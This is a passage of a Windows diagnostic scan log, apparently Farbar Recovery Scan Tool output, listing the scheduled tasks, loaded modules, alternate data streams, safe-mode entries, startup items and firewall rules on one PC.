Task: {D394BE25-2E16-45D4-AAB2-3E8861A09351} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask
Task: {D3C4106A-D511-42C6-9716-465644534C87} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierinstall => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)
Task: {D941F53F-7907-4FBE-B1E7-69EBD5B3A5D8} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceLocationRightsChange
Task: {DA856DF9-93EE-4AB2-87C2-867385F2262A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-07] (Google Inc.)
Task: {DD1F0805-7E74-403A-85DE-5C0E31E01169} - System32\Tasks\Microsoft\Windows\SpacePort\SpaceManagerTask => C:\Windows\system32\spaceman.exe [2016-09-15] (Microsoft Corporation)
Task: {DDAECFC0-67E3-4062-BF25-CD685F73B394} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\IntegrityCheck
Task: {DE4F9764-9E73-4F9F-8F24-A6CA1FEE3248} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {E1935286-5CEB-4530-9F4D-F6427CD704B9} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {E1949760-83C6-436C-AAC4-3082F5B107C3} - System32\Tasks\Motorola Device Manager Initial Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {E6C59EFE-9151-4D35-BEA9-93E8415BF71B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {E7B04252-97CA-42C6-9920-F58B76B2C3E1} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic24
Task: {E9BC11D6-9D78-4595-B779-862926E669D9} - System32\Tasks\Lenovo Smart Voice => C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvTrayLoad.exe [2013-10-26] (Lenovo)
Task: {EA9BAA00-6604-4A27-8A73-AFA65F0EE1B3} - System32\Tasks\Microsoft\Windows\SharedPC\Account Cleanup => Rundll32.exe %windir%\System32\Windows.SharedPC.AccountManager.dll,StartMaintenance
Task: {ECEDC57D-8965-4EB1-BD6F-84791D928E23} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierdaily => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)
Task: {F3C93D2A-FB91-4888-AE34-ABFB048F8A25} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\Program Files\Windows Defender\\MpCmdRun.exe [2016-07-16] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (Whitelisted) ==============

2016-07-16 05:42 - 2016-07-16 05:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-14 08:03 - 2016-12-09 04:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-11-08 01:15 - 2017-01-17 03:25 - 00117440 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2013-10-26 19:01 - 2012-04-24 04:43 - 00390632 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2013-10-26 19:01 - 2013-10-26 19:01 - 00061200 _____ () C:\ProgramData\LenovoTransition\Server\x64\dptf.dll
2016-12-14 08:03 - 2016-12-09 04:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-07-29 23:04 - 2016-05-24 10:43 - 08909504 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-10-16 04:02 - 2015-10-16 04:02 - 00043480 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll
2017-01-10 22:44 - 2016-12-21 00:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 22:44 - 2016-12-21 00:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-09-24 00:58 - 2016-09-24 00:58 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 22:44 - 2016-12-21 01:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-02-02 19:58 - 2017-02-01 03:47 - 02459992 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll
2017-02-02 19:58 - 2017-02-01 03:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll
2017-03-01 18:15 - 2017-03-01 18:18 - 00019456 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2017-03-01 18:15 - 2017-03-01 18:18 - 21149696 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2017-03-01 18:15 - 2017-03-01 18:18 - 05380096 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\MediaEngine.dll
2016-07-30 00:06 - 2016-07-30 00:07 - 00680448 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.DesignCore.dll
2017-03-01 18:15 - 2017-03-01 18:18 - 00387584 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.RichMedia.Ink.Controls.dll
2017-03-01 18:15 - 2017-03-01 18:18 - 01047552 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.Sharing.dll
2016-07-30 00:02 - 2016-07-30 00:02 - 00291328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00152000 _____ () C:\Program Files\VideoLAN\VLC\libvlc.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 02763200 _____ () C:\Program Files\VideoLAN\VLC\libvlccore.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00626624 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00046016 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00042944 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 12298176 _____ () C:\Program Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 01487808 _____ () C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00091072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirect3d_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00083392 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 02568640 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00118720 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00267712 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00091072 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libvdr_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00059328 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00074176 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00684480 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00833984 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00140224 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00055232 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\librar_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00150464 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 01605056 _____ () C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00349120 _____ () C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00028608 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libwin_msg_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00068032 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00051648 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libwin_hotkeys_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00238016 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00108992 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00108992 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00094144 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00039872 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00034240 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00027584 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00094144 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00033728 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00033216 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libcaf_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 01070016 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00144320 _____ () C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 01429952 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00049600 _____ () C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libfolder_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00763840 _____ () C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libupnp_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00033728 _____ () C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libpodcast_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00030656 _____ () C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libmediadirs_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00027072 _____ () C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libwindrive_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00330688 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libjpeg_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00031168 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libcdg_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00347584 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 01521088 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libschroedinger_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00844736 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libvorbis_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00339392 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libtheora_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00032704 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libdts_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00049600 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libaraw_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00056256 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libsubstx3g_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00437696 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libflac_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00038848 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libg711_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00028096 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libaes3_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00199616 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libspeex_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 03009472 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liblibass_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00426432 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libfaad_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00031680 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liba52_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00031168 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libmpeg_audio_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00035264 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liblpcm_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00455616 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libopus_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00135104 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libdvbsub_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00032192 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libspudec_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 15975872 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libavcodec_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00916928 _____ () C:\Program Files\VideoLAN\VLC\plugins\text_renderer\libfreetype_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00051136 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_sse2_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00037824 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_mmx_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00816576 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libswscale_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00041920 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_sse2_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00133056 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_sse2_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00068032 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_mmx_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00033216 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_mmx_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00046528 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i422_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00030656 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libgrey_yuv_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00059840 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i420_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00042944 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00053696 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00043456 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00027072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_i420_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00027072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_filter\libscale_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_filter\libyuvp_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libfloat_mixer_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00034240 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libscaletempo_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00148928 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libmpgatofixed32_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00196544 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libdtstofloat32_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00091584 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\liba52tofloat32_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 01515456 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libsamplerate_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00036800 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libsimple_channel_mixer_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00025536 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\liba52tospdif_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libdtstospdif_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00032192 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libdolby_surround_decoder_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00026048 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libugly_resampler_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00029632 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00051136 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libaudio_format_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00039872 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libcompressor_plugin.dll
2014-04-07 08:31 - 2014-04-07 08:31 - 00172032 _____ () C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\css_core.dll
2016-04-25 11:39 - 2016-04-25 11:39 - 00904704 _____ () C:\Program Files (x86)\Examsoft\Softest 11.0\System.Data.SQLite.dll
2013-10-26 18:44 - 2013-08-08 14:25 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
 
==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\BlackChipPoker:Win32App_1
AlternateDataStreams: C:\Program Files\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files\CCleaner:Win32App_1
AlternateDataStreams: C:\Program Files\Dolby Digital Plus:Win32App_1
AlternateDataStreams: C:\Program Files\FileZilla FTP Client:Win32App_1
AlternateDataStreams: C:\Program Files\Intel:Win32App_1
AlternateDataStreams: C:\Program Files\iTunes:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Office 15:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files\WinRAR:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Apple Software Update:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\BlueStacks:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\DVD Shrink:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\LastPass:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Magical Jelly Bean:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\mIRC:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Mozilla Firefox:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\MSXML 4.0:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\QuickTime Alternative:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\TeamViewer:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VPN Unlimited:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VUDUToGo:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\XnConvert:Win32App_1
AlternateDataStreams: C:\WINDOWS\SysWOW64:Win32App_1
AlternateDataStreams: C:\ProgramData\BlueStacks:Win32App_1
AlternateDataStreams: C:\ProgramData\Intel(R) Update Manager:Win32App_1
AlternateDataStreams: C:\ProgramData\regid.1991-06.com.microsoft:Win32App_1

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iai2c.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SpbCx.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\uefi.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52} => ""="Firmware"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SpbCx.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\uefi.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52} => ""="Firmware"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\windows\img0.jpg
DNS Servers: 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "Classic Start Menu"
HKLM\...\StartupApproved\Run: => "Yoga PhoneCompanion"
HKLM\...\StartupApproved\Run: => "Yoga Picks"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "Lenovo App Shop"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "AirDroid 3"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_D61B85333F3CD95B073389B3076505BE"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [WirelessDisplay-Infra-In-TCP] => (Allow) %systemroot%\system32\CastSrv.exe
FirewallRules: [UDP Query User{47BE3932-400F-49D0-983D-B4D7CED199B5}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [TCP Query User{2AA3B6D0-E876-458B-BE9E-81C10DE06741}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [UDP Query User{CE49CF93-0EC8-404F-9790-90157F4F923A}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe
FirewallRules: [TCP Query User{B1056847-28B0-48DD-9F41-8948B38D2E44}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe
FirewallRules: [UDP Query User{BB893E07-8667-4F69-BC72-936B06D0CC54}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [TCP Query User{C5B0DE44-2C65-4567-AE9B-1C023CFDCD8D}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [UDP Query User{C73A393A-FC2C-46DA-B962-BA7AB67F320C}C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe
FirewallRules: [TCP Query User{33A133CD-7086-4E7B-870A-2B14E043A99D}C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe
FirewallRules: [{516EB7FE-6646-4875-9FBE-33EF828D56EA}] => (Allow) C:\Program Files\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{B765F9AF-C656-4870-8DBF-E1A1610395FC}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismagent.exe
